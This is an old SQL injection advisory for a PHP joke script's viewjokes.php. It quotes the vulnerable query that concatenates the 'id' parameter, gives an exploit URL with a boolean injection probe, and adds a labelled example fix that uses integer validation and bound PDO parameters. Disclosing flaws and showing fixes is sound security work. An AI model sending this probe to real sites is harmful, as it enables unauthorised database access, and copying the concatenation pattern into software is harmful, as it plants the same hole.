/*

Name : Evernew Free Joke Script (viewjokes.php) SQL Injection
WebSite : www.evernewscripts.com

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com

Greetz : Zuka , int_0x80 , geeksec.com ... a lot

*/

# VULN CODE ]--[ viewjokes.php :

$id=$HTTP_GET_VARS['id'];
$title=$HTTP_GET_VARS['title'];

stuffViewer($id, 'jokes');

$query="select * from jokes where id=$id";
$allresults=mysql_query($query);
$viewjokes=mysql_fetch_array($allresults);

# EXPLOIT :

http://[THINGS ...]/viewjokes.php?id=5+and+(select 1)=1--
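
# FIX (added example, not part of the original advisory and not the vendor's code) :

The query pattern above next to a hardened form that validates id as an integer and binds it as a parameter. Assumptions: PDO with an in-memory SQLite database stands in for the script's MySQL backend, and the function names and the jokes row are constructed for illustration.

```php
<?php
// Added example, not code from Evernew Free Joke Script.
// Assumption: in-memory SQLite via PDO replaces the script's MySQL connection.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jokes (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO jokes VALUES (5, 'Sample', 'Constructed row')"); // constructed data

// Same pattern as viewjokes.php: the raw request value is concatenated into
// the SQL text, so everything after the number is parsed as SQL.
function viewJokeVulnerable(PDO $db, string $id)
{
    $query = "select * from jokes where id=$id";
    return $db->query($query)->fetch(PDO::FETCH_ASSOC);
}

// Hardened form: accept only a positive decimal integer, then pass it as a
// bound parameter so the value can never become part of the SQL text.
function viewJokeHardened(PDO $db, string $id)
{
    $valid = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($valid === false) {
        return false; // not a plain integer: reject before touching the database
    }
    $stmt = $db->prepare('SELECT id, title, body FROM jokes WHERE id = :id');
    $stmt->bindValue(':id', $valid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// The id value from the request shown on this page, URL-decoded ('+' is a space).
$fromPage = '5 and (select 1)=1--';

// Vulnerable path: the appended condition is executed by the database.
var_dump(viewJokeVulnerable($db, $fromPage) !== false);

// Hardened path: the same value fails integer validation and no query runs.
var_dump(viewJokeHardened($db, $fromPage));

// Hardened path with a legitimate id still returns the row.
var_dump(viewJokeHardened($db, '5')['title']);
```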

Date : 02/01/2010